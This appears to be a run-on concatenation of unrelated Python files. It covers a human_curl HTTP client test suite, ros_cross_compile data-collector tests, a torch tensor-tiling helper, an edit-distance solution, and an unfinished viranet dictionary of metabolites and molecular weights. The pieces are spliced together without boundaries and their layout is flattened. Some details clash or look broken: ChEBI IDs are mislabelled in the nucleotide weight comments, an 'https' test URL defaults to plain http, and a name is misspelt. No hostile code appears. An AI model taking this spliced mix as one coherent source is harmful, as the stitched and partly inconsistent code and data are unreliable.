human_curl :copyright: (c) 2011 - 2012 by (). :license: BSD, see LICENSE for more details. 
""" import io import os import time import pycurl import http.cookiejar from http.cookies import Morsel import json import uuid from random import randint, choice from string import ascii_letters, digits import logging from urllib.parse import urljoin import unittest import urllib.request, urllib.parse, urllib.error from types import FunctionType from urllib.parse import urlencode import human_curl as requests from human_curl import Request, Response from human_curl import AsyncClient from human_curl.auth import * from human_curl.utils import * from human_curl.exceptions import (CurlError, InterfaceError) logger = logging.getLogger("human_curl.test") async_logger = logging.getLogger("human_curl.core") async_logger.setLevel(logging.DEBUG) ## # Add the log message handler to the logger ## # LOG_FILENAME = os.path.join(os.path.dirname(__file__), "debug.log") ## # handler = logging.handlers.FileHandler(LOG_FILENAME) handler = logging.StreamHandler() formatter = logging.Formatter("%(levelname)s %(asctime)s %(module)s [%(lineno)d] %(process)d %(thread)d | %(message)s ") handler.setFormatter(formatter) async_logger.addHandler(handler) TEST_METHODS = ( ('get', requests.get), ('post', requests.post), ('head', requests.head), ('delete', requests.delete), ('put', requests.put), ('options', requests.options)) # Use https://github.com/Lispython/httphq HTTP_TEST_URL = os.environ.get('HTTP_TEST_URL', 'http://httpbin.org') HTTPS_TEST_URL = os.environ.get('HTTPS_TEST_URL', 'http://httpbin.org') CurlError("Use {0} as test server".format(HTTP_TEST_URL)) def build_url(*parts): return urljoin(HTTP_TEST_URL, "/".join(parts)) def build_url_secure(*parts): return urljoin(HTTPS_TEST_URL, "/".join(parts)) TEST_SERVERS = (build_url, build_url_secure) def stdout_debug(debug_type, debug_msg): """Print messages """ debug_types = ('I', '<', '>', '<', '>') if debug_type == 0: print(('%s' % debug_msg.strip())) elif debug_type in (1, 2): for line in debug_msg.splitlines(): print(('%s %s' % (debug_types[debug_type], line))) elif debug_type == 4: print(('%s %r' % (debug_types[debug_type], debug_msg))) def random_string(num=10): return ''.join([choice(ascii_letters + digits) for x in range(num)]) class BaseTestCase(unittest.TestCase): @staticmethod def random_string(num=10): return random_string(10) def random_dict(self, num=10): return dict([(self.random_string(10), self.random_string(10))for x in range(10)]) def request_params(self): data = self.random_dict(10) data['url'] = build_url("get") data['method'] = 'get' return data class RequestsTestCase(BaseTestCase): def test_build_url(self): self.assertEquals(build_url("get"), HTTP_TEST_URL + "/" + "get") self.assertEquals(build_url("post"), HTTP_TEST_URL + "/" + "post") self.assertEquals(build_url("redirect", "3"), HTTP_TEST_URL + "/" + "redirect" + "/" + "3") def tests_invalid_url(self): self.assertRaises(ValueError, requests.get, "wefwefwegrer") def test_url(self): self.assertEquals(requests.get(build_url("get")).url, build_url("get")) def test_request(self): for method, method_func in TEST_METHODS: r = method_func(build_url(method)) self.assertTrue(isinstance(r, Response)) def test_HTTP_GET(self): r = requests.get(build_url("get")) self.assertEquals(r.status_code, 200) def test_HTTP_POST(self): r = requests.post(build_url("post")) self.assertEquals(r.status_code, 200) """ def test_HTTP_HEAD(self): r = requests.head(build_url("head")) self.assertEquals(r.status_code, 200) def test_HTTP_OPTIONS(self): r = requests.options(build_url("options")) 
self.assertEquals(r.status_code, 200) """ def test_HTTP_PUT(self): r = requests.put(build_url("put")) self.assertEquals(r.status_code, 200) r2 = requests.put(build_url("put"), data='kcjbwefjhwbcelihbflwkh') self.assertEquals(r2.status_code, 200) def test_HTTP_DELETE(self): r = requests.delete(build_url("delete")) self.assertEquals(r.status_code, 200) def test_HEADERS(self): import string headers = (("test-header", "test-header-value"), ("Another-Test-Header", "kjwbrlfjbwekjbf")) r = requests.get(build_url("headers"), headers=headers) self.assertEquals(r.status_code, 200) r_json = json.loads(r.text) for field, value in headers: self.assertEquals(r_json['headers'].get(string.capwords(field, "-")), value) def test_PARAMS(self): params = {'q': 'test param'} r = requests.get(build_url("get""?test=true"), params=params) self.assertEquals(r.status_code, 200) args = json.loads(r.text)['args'] self.assertEquals(args['q'], params['q']) self.assertEquals(args["test"], "true") def test_POST_DATA(self): random_key = "key_" + uuid.uuid4().hex[:10] random_value = "value_" + uuid.uuid4().hex r = requests.post(build_url('post'), data={random_key: random_value}) self.assertEquals(r.status_code, 200) def test_PUT_DATA(self): random_key = "key_" + uuid.uuid4().hex[:10] random_value = "value_" + uuid.uuid4().hex r = requests.put(build_url('put'), data={random_key: random_value}) self.assertEquals(r.status_code, 200) def test_POST_RAW_DATA(self): random_key = "key_" + uuid.uuid4().hex[:10] random_value = "value_" + uuid.uuid4().hex data = "%s:%s" % (random_key, random_value) r = requests.post(build_url('post'), data=data) self.assertEquals(r.status_code, 200) self.assertTrue(r.text.find(data) != -1) def test_PUT_RAW_DATA(self): random_key = "key_" + uuid.uuid4().hex[:10] random_value = "value_" + uuid.uuid4().hex data = "%s:%s" % (random_key, random_value) r = requests.put(build_url('put'), data=data) self.assertEquals(r.status_code, 200) self.assertTrue(r.text.find(data) != -1) def test_FILES(self): files = {'test_file': io.open('test_human_curl.py'), 'test_file2': io.open('README.rst')} r = requests.post(build_url('post'), files=files) json_response = json.loads(r.text) self.assertEquals(r.status_code, 200) for k, v in list(files.items()): self.assertTrue(k in list(json_response['files'].keys())) def test_POST_DATA_and_FILES(self): files = {'test_file': io.open('test_human_curl.py'), 'test_file2': io.open('README.rst')} random_key1 = "key_" + uuid.uuid4().hex[:10] random_value1 = "value_" + uuid.uuid4().hex random_key2 = "key_" + uuid.uuid4().hex[:10] random_value2 = "value_" + uuid.uuid4().hex r = requests.post(build_url('post'), data={random_key1: random_value2, random_key2: random_value2}, files=files) self.assertEquals(r.status_code, 200) def test_PUT_DATA_and_FILES(self): files = {'test_file': io.open('test_human_curl.py'), 'test_file2': io.open('README.rst')} random_key1 = "key_" + uuid.uuid4().hex[:10] random_key2 = "key_" + uuid.uuid4().hex[:10] random_value2 = "value_" + uuid.uuid4().hex r = requests.put(build_url('put'), data={random_key1: random_value2, random_key2: random_value2}, files=files) self.assertEquals(r.status_code, 200) def test_cookies_jar(self): random_key = "key_" + uuid.uuid4().hex[:10] random_value = "value_" + uuid.uuid4().hex random_key2 = "key_" + uuid.uuid4().hex[:10] random_value2 = "value_" + uuid.uuid4().hex cookies = ((random_key, random_value), (random_key2, random_value2)) cookies_jar = http.cookiejar.CookieJar() r1 = requests.get(build_url("cookies", "set", random_key, 
random_value), cookies=cookies_jar, debug=stdout_debug) self.assertEquals(r1.cookies[random_key], random_value) rtmp = requests.get(build_url("cookies", "set", random_key2, random_value2), cookies=cookies_jar, debug=stdout_debug) for cookie in cookies_jar: if cookie.name == random_key: self.assertEquals(cookie.value, random_value) r3 = requests.get(build_url('cookies'), cookies=cookies_jar, debug=stdout_debug) json_response = json.loads(r3.text) print(json_response) for k, v in cookies: self.assertEquals(json_response['cookies'][k], v) def test_send_cookies(self): random_key = "key_" + uuid.uuid4().hex[:10] random_value = "value_" + uuid.uuid4().hex random_key2 = "key_" + uuid.uuid4().hex[:10] random_value2 = "value_" + uuid.uuid4().hex cookies = ((random_key, random_value), (random_key2, random_value2)) r = requests.get(build_url('cookies'), cookies=cookies) # debug=stdout_debug) json_response = json.loads(r.text) # print(json_response) self.assertEquals(json_response['cookies'][random_key], random_value) def test_basic_auth(self): username = uuid.uuid4().hex password = uuid.uuid4().hex auth_manager = BasicAuth(username, password) r = requests.get(build_url('basic-auth', username, password), auth=auth_manager) self.assertEquals(r.status_code, 200) json_response = json.loads(r.text) # print(json_response) # self.assertEquals(json_response['password'], password) self.assertEquals(json_response['user'], username) self.assertEquals(json_response['authenticated'], True) # self.assertEquals(json_response['auth-type'], 'basic') """ def test_digest_auth(self): username = uuid.uuid4().hex password = uuid.uuid4().hex auth_manager = DigestAuth(username, password) r = requests.get(build_url('digest-auth/auth/', username, password), auth=auth_manager, allow_redirects=True) self.assertEquals(r.status_code, 200) json_response = json.loads(r.text) # self.assertEquals(json_response['password'], password) self.assertEquals(json_response['user'], username) self.assertEquals(json_response['authenticated'], True) # self.assertEquals(json_response['auth-type'], 'digest') """ def test_auth_denied(self): username = "hacker_username" password = "" http_auth = (username, password) r = requests.get(build_url('basic-auth', "username", "password"), auth=http_auth) self.assertEquals(r.status_code, 401) def test_multivalue_params(self): random_key = "key_" + uuid.uuid4().hex[:10] random_value1 = "value_" + uuid.uuid4().hex random_value2 = "value_" + uuid.uuid4().hex r = requests.get(build_url("get"), params={random_key: (random_value1, random_value2)}) self.assertEquals(build_url("get?%s" % urlencode(((random_key, random_value1), (random_key, random_value2)))), r.url) json_response = json.loads(r.text) self.assertTrue(random_value1 in json_response['args'][random_key]) self.assertTrue(random_value2 in json_response['args'][random_key]) def test_multivalue_post_data(self): random_key = "key_" + uuid.uuid4().hex[:10] random_value1 = "value_" + uuid.uuid4().hex random_value2 = "value_" + uuid.uuid4().hex r = requests.post( build_url("post"), data={random_key: (random_value1, random_value2)}) json_response = json.loads(r.text) # print(json_response) self.assertTrue(random_value1 in json_response['form'][random_key]) self.assertTrue(random_value2 in json_response['form'][random_key]) def test_redirect(self): r = requests.get(build_url("redirect", '3'), allow_redirects=True) self.assertEquals(r.status_code, 200) self.assertEquals(len(r.history), 3) self.assertEquals(r.url, build_url("get")) self.assertEquals(r._request_url, 
build_url("redirect/3").encode('utf8 ')) self.assertRaises(CurlError, requests.get, build_url("redirect", '7'), allow_redirects=True) def test_gzip(self): r = requests.get(build_url("gzip"), use_gzip=True) print((r.request._headers)) print((r.headers)) self.assertEquals(r.headers['Content-Encoding'], 'gzip') json_response = json.loads(r.text) self.assertEquals(json_response['gzipped'], True) def test_response_info(self): r = requests.get(build_url("get")) def test_unicode_domains(self): r = requests.get("http://➡.ws/pep8") self.assertEquals(r.url, 'http://xn--hgi.ws/pep8') def test_hooks(self): def pre_hook(r): r.pre_hook = True def post_hook(r): r.post_hook = True def response_hook(r): r._status_code = 700 return r r1 = requests.get(build_url("get"), hooks={'pre_request': pre_hook, 'post_request': post_hook}) self.assertEquals(r1._request.pre_hook, True) self.assertEquals(r1._request.post_hook, True) r2 = requests.get(build_url("get"), hooks={'response_hook': response_hook}) self.assertEquals(r2._status_code, 700) def test_json_response(self): random_key = "key_" + uuid.uuid4().hex[:10] random_value1 = "value_" + uuid.uuid4().hex random_value2 = "value_" + uuid.uuid4().hex r = requests.get(build_url("get"), params={random_key: (random_value1, random_value2)}) self.assertEquals(build_url("get?%s" % urlencode(((random_key, random_value1), (random_key, random_value2)))), r.url) json_response = json.loads(r.text) self.assertTrue(isinstance(r.json, dict)) self.assertEquals(json_response, r.json) self.assertTrue(random_value1 in r.json['args'][random_key]) self.assertTrue(random_value2 in r.json['args'][random_key]) def test_get_encode_query(self): params = {'q': 'value with space and @'} key, value = 'email', '' response = requests.get(build_url("get""?%s=%s" % (key, value)), params=params) self.assertEquals(response.status_code, 200) self.assertEqual("{0}/get?email=user%40domain.com&q=value+with+space+and+%40".format(HTTP_TEST_URL).encode('utf8 '), response.request._url) args = json.loads(response.text)['args'] self.assertEquals(args['q'], params['q']) self.assertEquals(args[key], value) def test_get_no_encode_query(self): params = {'q': 'value with space and @'} key, value = 'email', '' # Invalid by HTTP spec try: # print(build_url("get?%s=%s" % (key, value))) response = requests.get(build_url("get?%s=%s" % (key, value)), params=params, encode_query=False) except CurlError as e: self.assertEqual(e.code, 52) else: self.assertEquals(response.status_code, 400) self.assertEqual("{0}/get?email=&q=value with space and @".format(HTTP_TEST_URL).encode('utf8'), response.request._url) def test_request_key_with_empty_value(self): key = "key" value = "" url = build_url("get""?%s=%s" % (key, value)) response = requests.get(url) self.assertEqual(url.encode('utf8'), response.request.url) def test_request_key_no_equal(self): key = "key+" url = build_url("get""?%s" % key) response = requests.get(url) self.assertEqual("{0}/get?key%2B".format(HTTP_TEST_URL).encode('utf8'), response.request.url) def test_request_key_no_equal_and_params(self): key = "key" params = {"a": "b"} url = build_url("get""?%s" % key) response = requests.get(url, params=params) self.assertEqual((url + "=" + "&a=b").encode('utf8'), response.request.url) class ResponseTestCase(BaseTestCase): def setUp(self): pass def tearDown(self): pass class RequestTestCase(BaseTestCase): def setUp(self): pass def tearDown(self): pass class UtilsTestCase(BaseTestCase): def test_case_insensitive_dict(self): test_data = { "lower-case-key": uuid.uuid4().hex, 
"UPPER-CASE-KEY": uuid.uuid4().hex, "CamelCaseKey": uuid.uuid4().hex} cidict = CaseInsensitiveDict(test_data) for k, v in list(test_data.items()): self.assertTrue(cidict[k], v) def test_cookies_from_jar(self): test_cookie_jar = http.cookiejar.CookieJar() cookies_dict = from_cookiejar(test_cookie_jar) for cookie in test_cookie_jar: self.assertEquals(cookies_dict[cookie.name], cookie.value) def test_jar_from_cookies(self): cookies_dict = dict([(uuid.uuid4().hex, uuid.uuid4().hex) for x in range(10)]) cookies_list = [(uuid.uuid4().hex, uuid.uuid4().hex) for x in range(10)] cookiejar1 = to_cookiejar(cookies_dict) cookiejar2 = to_cookiejar(cookies_list) for cookie in cookiejar1: self.assertEquals(cookie.value, cookies_dict[cookie.name]) for cookie in cookiejar2: for k, v in cookies_list: if k == cookie.name: self.assertEquals(cookie.value, v) def test_decode_gzip(self): from gzip import GzipFile data_for_gzip = Request.__doc__ tmp_buffer = io.BytesIO() gziped_buffer = GzipFile( fileobj=tmp_buffer, mode="wb", compresslevel=7) gziped_buffer.write(data_for_gzip) gziped_buffer.close() gzipped_data = tmp_buffer.getvalue() tmp_buffer.close() self.assertEquals(data_for_gzip, decode_gzip(gzipped_data)) def test_morsel_to_cookie(self): from time import strftime, localtime time_template = "%a, %d-%b-%Y %H:%M:%S GMT" m = Morsel() m['domain'] = ".yandex" m['domain'] = ".yandex.ru" m['path'] = "/" m['expires'] = "Fri, 27-Aug-2021 17:43:25 GMT" m.key = "" m.value = "fvjlrwnlkjnf" c = morsel_to_cookie(m) self.assertEquals(m.key, c.name) self.assertEquals(m.value, c.value) for x in ('expires', 'path', 'comment', 'domain', 'secure', 'version'): if x == 'expires': self.assertEquals(m[x], strftime(time_template, localtime(getattr(c, x, None)))) elif x == 'version': self.assertTrue(isinstance(getattr(c, x, None), int)) else: self.assertEquals(m[x], getattr(c, x, None)) def test_data_wrapper(self): random_key1 = "key_" + uuid.uuid4().hex[:10] random_key2 = "key_" + uuid.uuid4().hex[:10] random_key3 = "key_" + uuid.uuid4().hex[:10] random_value1 = "value_" + uuid.uuid4().hex random_value2 = "value_" + uuid.uuid4().hex random_value3 = "value_" + uuid.uuid4().hex test_dict = {random_key1: random_value1, random_key2: [random_value1, random_value2], random_key3: (random_value2, random_value3)} test_list = ((random_key1, random_value1), (random_key2, [random_value1, random_value2]), (random_key3, (random_value2, random_value3))) control_list = ((random_key1, random_value1), (random_key2, random_value1), (random_key2, random_value2), (random_key3, random_value2), (random_key3, random_value3)) converted_dict = data_wrapper(test_dict) for k, v in control_list: tmp = [] for k2, v2 in converted_dict: if k2 == k: tmp.append(v2) self.assertTrue(v in tmp) converted_list = data_wrapper(test_list) for k, v in control_list: tmp = [] for k2, v2 in converted_list: if k2 == k: tmp.append(v2) self.assertTrue(v in tmp) def test_curl_post_files(self): test_files = (('field_file_name', './README.rst'), ('field_file_name2', io.open('./setup.py')), ('multiple_files_field', (io.open("./README.rst"), "./setup.py"))) curl_files_dict = make_curl_post_files(test_files) for k, v in curl_files_dict: if isinstance(v, (tuple, list)): self.assertTrue(isinstance(v, (tuple, list))) self.assertTrue(os.path.exists(v[1])) self.assertEquals(v[0], pycurl.FORM_FILE) else: assert False class AuthManagersTestCase(BaseTestCase): def test_parse_dict_header(self): value = '''username="Mufasa", realm="", nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", 
uri="/dir/index.html", qop=auth, nc=00000001, cnonce="0a4f113b", response="6629fae49393a05397450978507c4ef1", opaque="5ccc069c403ebaf9f0171e9517f40e41"''' parsed_header = parse_dict_header(value) self.assertEquals(parsed_header['username'], "Mufasa") self.assertEquals(parsed_header['realm'], "") self.assertEquals(parsed_header['nonce'], "dcd98b7102dd2f0e8b11d0f600bfb0c093") self.assertEquals(parsed_header['uri'], "/dir/index.html") self.assertEquals(parsed_header['qop'], "auth") self.assertEquals(parsed_header['nc'], "00000001") def test_escape(self): self.assertEquals(urllib.parse.unquote(url_escape("http://sp.example.com/")), "http://sp.example.com/") def test_generate_nonce(self): self.assertEquals(len(generate_nonce(8)), 8) def test_generate_verifier(self): self.assertEquals(len(generate_nonce(8)), 8) def test_normalize_parameters(self): url = 'http://api.simplegeo.com:80/1.0/places/address.json?q=monkeys&category=animal&address=41+Decatur+St,+San+Francisc\\u2766,+CA' parameters = 'address=41%20Decatur%20St%2C%20San%20Francisc%E2%9D%A6%2C%20CA&category=animal&q=monkeys' self.assertEquals(parameters, normalize_parameters(url)) url = 'http://api.simplegeo.com:80/1.0/places/address.json?q=monkeys&category=animal&address=41+Decatur+St,+San+Francisc\\u2766,+CA' self.assertEquals(parameters, normalize_parameters(url)) url = 'http://api.simplegeo.com:80/1.0/places/address.json?q=monkeys&category=animal&address=41+Decatur+St,+San+Francisc\xe2\x9d\xa6,+CA' self.assertEquals(parameters, normalize_parameters(url)) url = 'http://api.simplegeo.com:80/1.0/places/address.json?q=monkeys&category=animal&address=41+Decatur+St,+San+Francisc%E2%9D%A6,+CA' self.assertEquals(parameters, normalize_parameters(url)) url = 'http://api.simplegeo.com:80/1.0/places/address.json?q=monkeys&category=animal&address=41+Decatur+St,+San+Francisc%E2%9D%A6,+CA' self.assertEquals(parameters, normalize_parameters(url)) def test_normalize_url(self): url = 'http://api.simplegeo.com:80/1.0/places/address.json?q=monkeys&category=animal&address=41+Decatur+St,+San+Francisc\\u2766,+CA' control_url = "http://api.simplegeo.com/1.0/places/address.json" self.assertEquals(control_url, normalize_url(url)) url = 'http://api.simplegeo.com:80/1.0/places/address.json?q=monkeys&category=animal&address=41+Decatur+St,+San+Francisc\\u2766,+CA' self.assertEquals(control_url, normalize_url(url)) url = 'http://api.simplegeo.com:80/1.0/places/address.json?q=monkeys&category=animal&address=41+Decatur+St,+San+Francisc\xe2\x9d\xa6,+CA' self.assertEquals(control_url, normalize_url(url)) url = 'http://api.simplegeo.com:80/1.0/places/address.json?q=monkeys&category=animal&address=41+Decatur+St,+San+Francisc%E2%9D%A6,+CA' self.assertEquals(control_url, normalize_url(url)) url = 'http://api.simplegeo.com:80/1.0/places/address.json?q=monkeys&category=animal&address=41+Decatur+St,+San+Francisc%E2%9D%A6,+CA' self.assertEquals(control_url, normalize_url(url)) class AsyncTestCase(BaseTestCase): def success_callback(self, async_client, opener, response, **kwargs): self.assertTrue(isinstance(opener.request, Request)) self.assertTrue(isinstance(response, Response)) self.assertTrue(isinstance(async_client, AsyncClient)) self.assertTrue(response.text.find(async_client._default_user_agent) != -1) def fail_callback(self, async_client, opener, errno, errmsg, **kwargs): self.assertTrue(isinstance(async_client, AsyncClient)) def test_AsyncClient_core(self): async_client = AsyncClient(size=20) self.assertEquals(async_client._num_conn, 20) 
self.assertEquals(async_client._remaining, 0) self.assertEquals(async_client.success_callback, None) self.assertEquals(async_client.fail_callback, None) self.assertEquals(async_client._openers_pool, None) self.assertEquals(async_client._data_queue, []) self.assertEquals(async_client.connections_count, 0) async_client.add_handler(url=build_url("/get"), method="get", params={"get1": "get1 value", "get2": "get2 value"}, success_callback=self.success_callback, fail_callback=self.fail_callback) self.assertEquals(len(async_client._data_queue), 1) self.assertTrue(isinstance(async_client._data_queue[0], dict)) params = self.random_dict(10) async_client.get(url=build_url("/get"), params=params, success_callback=self.success_callback, fail_callback=self.fail_callback) self.assertTrue(isinstance(async_client._data_queue[1], dict)) self.assertEquals(async_client._data_queue[1]['params'], params) self.assertEquals(async_client.connections_count, 2) def test_async_get(self): async_client_global = AsyncClient(success_callback=self.success_callback, fail_callback=self.fail_callback) params = self.random_dict(10) url = build_url("get") self.assertEquals(async_client_global.get(url, params=params), async_client_global) self.assertEquals(len(async_client_global._data_queue), 1) # Test process_func def process_func(num_processed, remaining, num_urls, success_len, error_len): print(("\nProcess {0} {1} {2} {3} {4}".format(num_processed, remaining, num_urls, success_len, error_len))) self.assertEquals(num_urls, 2) def fail_callback(request, errno, errmsg, async_client, opener): self.assertTrue(isinstance(request, Request)) self.assertTrue(isinstance(async_client, AsyncClient)) self.assertEquals(async_client, async_client_global) self.assertEquals(errno, 6) self.assertEquals(errmsg, "Couldn't resolve host '{0}'".format(request.url[7:])) async_client_global.get("http://fwbefrubfbrfybghbfb4gbyvrv.com", params=params, fail_callback=fail_callback) self.assertEquals(len(async_client_global._data_queue), 2) async_client_global.start(process_func) def test_setup_opener(self): async_client = AsyncClient() data = self.random_dict(10) data['url'] = build_url("get") data['method'] = 'get' opener = async_client.get_opener() self.assertEquals(getattr(opener, 'success_callback', None), None) self.assertEquals(getattr(opener, 'fail_callback', None), None) self.assertEquals(getattr(opener, 'request', None), None) data['success_callback'] = lambda **kwargs: kwargs data['fail_callback'] = lambda **kwargs: kwargs async_client.configure_opener(opener, data) self.assertTrue(isinstance(opener.request, Request)) self.assertTrue(isinstance(opener.success_callback, FunctionType)) self.assertTrue(isinstance(opener.fail_callback, FunctionType)) def test_add_handler(self): async_client = AsyncClient() data = self.request_params() self.assertRaises(InterfaceError, async_client.add_handler, **data) data['success_callback'] = lambda **kwargs: kwargs data['fail_callback'] = lambda **kwargs: kwargs async_client.add_handler(**data) self.assertEquals(async_client._data_queue[0], data) self.assertEquals(async_client._num_urls, 1) self.assertEquals(async_client._remaining, 1) def test_get_opener(self): async_client = AsyncClient() opener = async_client.get_opener() self.assertEquals(opener.fp, None) self.assertNotEqual(opener, None) def test_AsyncClient_contextmanager(self): with AsyncClient(success_callback=self.success_callback, fail_callback=self.fail_callback) as async_client_global: params = self.random_dict(10) url = build_url("get") 
self.assertEquals(async_client_global.get(url, params=params), async_client_global) self.assertEquals(len(async_client_global._data_queue), 1) # Test process_func def process_func(num_processed, remaining, num_urls, success_len, error_len): print(("\nProcess {0} {1} {2} {3} {4}".format(num_processed, remaining, num_urls, success_len, error_len))) self.assertEquals(num_urls, 2) def fail_callback(request, errno, errmsg, async_client, opener): self.assertTrue(isinstance(request, Request)) self.assertTrue(isinstance(async_client, AsyncClient)) self.assertEquals(async_client, async_client_global) self.assertEquals(errno, 6) self.assertEquals(errmsg, "Couldn't resolve host '{0}'".format(request.url[7:])) async_client_global.get("http://fwbefrubfbrfybghbfb4gbyvrv.com", params=params, fail_callback=fail_callback) self.assertEquals(len(async_client_global._data_queue), 2) def suite(): suite = unittest.TestSuite() suite.addTest(unittest.makeSuite(RequestsTestCase)) suite.addTest(unittest.makeSuite(ResponseTestCase)) suite.addTest(unittest.makeSuite(RequestTestCase)) suite.addTest(unittest.makeSuite(UtilsTestCase)) suite.addTest(unittest.makeSuite(AuthManagersTestCase)) suite.addTest(unittest.makeSuite(AsyncTestCase)) return suite if __name__ == '__main__': unittest.main(defaultTest="suite") # Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
import json from json import JSONDecodeError from pathlib import Path import pytest from ros_cross_compile.data_collector import DataCollector from ros_cross_compile.data_collector import DataWriter from ros_cross_compile.data_collector import Datum def test_datum_construction(): test_datum = Datum('test_stat', 3, 'tests', 130.222, True) assert test_datum def test_collector_construction(): test_collector = DataCollector() assert test_collector def test_data_collection(): test_collector = DataCollector() test_datum_a = Datum('test_stat_1', 3, 'tests', 130.452, True) test_datum_b = Datum('test_stat_2', 4, 'tests', 130.455, True) test_collector.add_datum(test_datum_a) test_collector.add_datum(test_datum_b) to_test_data = test_collector._data assert to_test_data[0].name == 'test_stat_1' assert to_test_data[1].name == 'test_stat_2' assert to_test_data[0].value == 3 assert to_test_data[0].unit == 'tests' assert abs(to_test_data[0].timestamp - 130.452) < 0.1 assert to_test_data[0].complete def test_timer_can_time(): test_collector = DataCollector() with test_collector.timer('test_time'): pass assert test_collector._data[0].complete assert test_collector._data[0].value > 0 def test_timer_error_handling(): test_collector = DataCollector() # The timer should not hide the exception, we expect it to add the datum value with pytest.raises(Exception): with test_collector.timer('test_time_fail'): raise Exception assert len(test_collector._data) > 0 assert test_collector._data[0].complete is False def test_data_writing(tmp_path): def load_json_validation(filename: Path) -> bool: try: with filename.open() as f: json.load(f) return True except JSONDecodeError: return False test_collector = DataCollector() test_datum_a = Datum('test_stat_1', 3, 'tests', 130.243, True) test_datum_b = Datum('test_stat_2', 4, 'tests', 130.244, True) test_collector.add_datum(test_datum_a) test_collector.add_datum(test_datum_b) test_writer = DataWriter(tmp_path) test_writer.write(test_collector) assert test_writer.write_file.exists() assert load_json_validation(test_writer.write_file) import numpy as np import torch def tile(a, dim, n_tile): """TIle the input array along the dimension. :param a: The tensor to repeat. :param dim: The dimension to repeat. :param n_tile: The number of times the dimension should be repeated. :return: The tiles torch tensor. """ init_dim = a.size(dim) repeat_idx = [1] * a.dim() repeat_idx[dim] = n_tile a = a.repeat(*repeat_idx) order_index = torch.LongTensor( np.concatenate([init_dim * np.arange(n_tile) + i for i in range(init_dim)]) ) return torch.index_select(a, dim, order_index) #Title:- Edit Distance '''Given two words word1 and word2, find the minimum number of operations required to convert word1 to word2. You have the following 3 operations permitted on a word: Insert a character Delete a character Replace a character Example 1: Input: word1 = "horse", word2 = "ros" Output: 3 Explanation: horse -> rorse (replace 'h' with 'r') rorse -> rose (remove 'r') rose -> ros (remove 'e')''' #Time and Space Complexity O(mn) #Author:- def editDistance(str1,str2,m,n): dp = [[0 for x in range(n + 1)] for x in range(m + 1)] for i in range(m + 1): for j in range(n + 1): if i == 0: dp[i][j] = j # Min. operations = j elif j == 0: dp[i][j] = i # Min. 
operations = i elif str1[i - 1] == str2[j - 1]: dp[i][j] = dp[i - 1][j - 1] else: dp[i][j] = 1 + min(dp[i][j - 1], # Insert dp[i - 1][j], # Remove dp[i - 1][j - 1]) # Replace return dp[m][n] str1 = "horse" str2 = "ros" print(editDistance(str1,str2,len(str1),len(str2))) viranet/info.py # VIRANET DEFINITIONS # # Metabolite (verbose to model) definitions metDict = { 'atp': 'atp[c]', # ATP, ChEBI 15422 'ctp': 'ctp[c]', # CTP, ChEBI 17677 'gtp': 'gtp[c]', # GTP, ChEBI 15996 'utp': 'utp[c]', # UTP, ChEBI 15713 'A': 'ala-L[c]', # Alaline, ChEBI 16977 'R': 'arg-L[c]', # Arginine, ChEBI 16467 'N': 'asn-L[c]', # Asparagine, ChEBI 17196 'D': 'asp-L[c]', # Aspartate, ChEBI 17053 'C': 'cys-L[c]', # Cysteine, ChEBI 17561 'Q': 'gln-L[c]', # Glutamine, ChEBI 18050 'E': 'glu-L[c]', # Glutamate, ChEBI 16015 'G': 'gly[c]', # Glycine, ChEBI 15428 'H': 'his-L[c]', # Histidine, ChEBI 15971 'I': 'ile-L[c]', # Isoleucine, ChEBI 17191 'L': 'leu-L[c]', # Leucine, ChEBI 15603 'K': 'lys-L[c]', # Lysine, ChEBI 18019 'M': 'met-L[c]', # Methionine, ChEBI 16643 'F': 'phe-L[c]', # Phenylalanine, ChEBI 17295 'P': 'pro-L[c]', # Proline, ChEBI 17203 'S': 'ser-L[c]', # Serine, ChEBI 17115 'T': 'thr-L[c]', # Threonine, ChEBI 16857 'W': 'trp-L[c]', # Tryptophan, ChEBI 16828 'Y': 'tyr-L[c]', # Tyrosine, ChEBI 17895 'V': 'val-L[c]', # Valine, ChEBI 16414 'h2o': 'h2o[c]', # H2O 'adp': 'adp[c]', # ADP 'Pi': 'pi[c]', # Phosphate 'h': 'h[c]', # Hydrogen [Proton] 'PPi': 'ppi[c]', # Pyrophosphate } # Nucleotide dictionary with molecular weights # Source: ChEBI https://www.ebi.ac.uk/chebi/ ntpsDict = { 'atp': 507.181, # ATP, ChEBI 15422 'gtp': 483.15644, # GTP, ChEBI 17677 'ctp': 523.18062, # CTP, ChEBI 15996 'utp': 484.14116, # UTP, ChEBI 15713 (TTP is psuedo for UTP in viral genome) } # Amino Acids dictionary with molecular weights # Source: ChEBI https://www.ebi.ac.uk/chebi/ aaDict = { 'A': 89.09322, # Alanine, ChEBI 16977 'R': 174.201, # Arginine, ChEBI 16467 'N': 132.118, # Asparagine, ChEBI 17196 'D': 133.1027, # Aspartate, ChEBI 17053 'C': 121.158, # Cysteine, ChEBI 17561 'Q': 146.14458, # Glutamine, ChEBI 18050 'E': 147.1293, # Glutamate, ChEBI 16015 'G': 75.06664, # Glycine, ChEBI 15428 'H': 155.15468, # Histidine, ChEBI 15971 'I': 131.17296, # Isoleucine, ChEBI 17191 'L': 131.17296, # Leucine, ChEBI 15603 'K': 146.18764, # Lysine, ChEBI 18019 'M': 149.21238, # Methionine, ChEBI 16643 'F': 165.18918, # Phenylalanine, ChEBI 17295 'P': 115.1305, # Proline, ChEBI 17203 'S': 105.09262, # Serine, ChEBI 17115 'T': 119.1192, # Threonine, ChEBI 16857 'W': 204.22526, # Tryptophan, ChEBI 16828 'Y': 181.18858, # Tyrosine, ChEBI 17895 'V': 117.14638, # Valine, ChEBI 16414 } # Misc. dictionary with molecular weights # Source: ChEBI https://www.ebi.ac.uk/chebi/ miscDict = { 'PPi': 173.94332, # Pyrophosphate, ChEBI 18361 } # Nucleotides List ntpsMets = list(ntpsDict.keys()) # Amino Acids List aaMets = list(aaDict.keys()) # Avogadro's Number N_A = 6.0221409e+23 # Energy requirement coefficients # Source: . (2008). Biological Thermodynamics (2nd ed.). Cambridge: Cambridge University Press. 
